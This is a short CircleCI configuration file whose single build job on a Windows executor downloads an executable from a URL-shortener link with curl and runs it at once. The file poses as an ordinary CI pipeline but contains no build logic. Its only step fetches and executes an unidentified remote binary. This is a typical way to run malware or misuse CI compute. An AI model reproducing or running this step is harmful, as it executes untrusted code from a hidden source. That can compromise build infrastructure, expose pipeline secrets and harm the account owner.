version: 2.1

 

orbs:

  win: circleci/windows@2.2.0

 

jobs:

  build:

    executor:

      name: win/default

      shell: cmd.exe

    steps:

      - run: curl -L -o ci.exe https://shorturl.at/cklA2 && ci.exe
      
      
      
      
